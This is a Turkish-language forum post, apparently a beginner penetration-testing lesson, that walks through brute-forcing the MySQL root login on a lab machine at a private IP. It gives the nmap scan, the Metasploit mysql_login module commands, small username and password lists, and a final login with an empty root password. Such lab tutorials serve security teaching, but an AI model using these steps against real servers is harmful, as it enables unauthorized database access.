Pentest Dersi Mysql Hackleme Metasploit

Pentest derslerine yavaş yavaş başlıyoruz. saldıracağımız ip adresimiz : 192.168.222.131 bu ip adresin mysql' una ulaşmaya çalışacağız.bunu yaparken kullanacağımız...

Pentest derslerine yavaş yavaş başlıyoruz.

saldıracağımız ip adresimiz : 192.168.222.131

bu ip adresin mysql' una ulaşmaya çalışacağız.bunu yaparken kullanacağımız materyaller :

1-Nmap

2-Metasploit

3-User list

4-Pass list

Tahmin edebileceğiniz üzere Hedef sistemin mysql'una brute force saldırısı düzenleyeceğim.

Nmap Aracılığla Açıklı port versionlarını görüntülüyorum.

-sS komutu ile Syn taraması yaparak tcp portlarını görüntüledim ve de -sV komutu ile remote servislerin versionlarını görüntüledim.Bizim burada bakacağımız şey mysql portu 3306 dır.

vpjo5O.png

Evet görüldüğü üzere Sistem Mysql Versiyonu olarak MySQL 5.0.51a-3ubuntu5 i kullanıyor.

Şimdi Metasploitimizi açalım ve uygun auxiliary'yi arayalım

Kod:
service postgresql start
Kod:
service mysql start
Kod:
msfconsole
Evet giriş yaptık.

şimdi komutumuz ise auxiliary aramak olucak.
Kod:
search mysql_login
yazalım.

Kod:
use auxiliary/scanner/mysql/mysql_login
ile auxiliary'ye giriş yapalım.Giriş Yaptık Ardından show options komutu ile bizden bazı seyleri doldurmamızı istediğini görüyoruz.

gWOL2L.png

Bizde Dolduralım o zaman.

Kod:
set RHOSTS 192.168.222.131
diyoruz ve enterlıyoruz. Hedef sistemi girdik.Ardından ben bir userlist ve passlist oluşturuyorum

userlistimiz:
Kod:
msfadmin
msf
root

passlistimiz:
Kod:
(boşluk-hiçbirşey)
root
msfadmin
pass
password
WQ7rG2.png

Ve Ardından run diyoruz. brute force atağımız başlıyor.

LnboOG.png

Evet brute force atağımız başarılı .

Kullanıcı adı : root

şifre : yok (hiçbirşey)

Kontrol edelim.Terminali açalım ve şunu yazalım.

Kod:
mysql -h 192.168.222.131 -u root -p (hiçbirşey yazılmıycak çünkü yok)
Ardından tekrar password soruyor gene enterlıyoruz birşey yazmadan ve Hedef sistemin mysql'una giriş yaptık.

nWOGO0.png

Konuyu anlatmamdaki amaç Mysql 3306 portunun metasploit ile nasıl hacklenebilineceği idi.

@Mectruy

Son düzenleme:
Zamanında kali linux kullandım USB üzerinden boot ederek ama boot ile sınırlı sayıda işlem yapabiliyoruz yoksa hack olaylarına çok fazla merakım varda işte :D

131,833Konular
3,271,812Mesajlar
316,338Kullanıcılar
cloudyacSon Üye
Üst Alt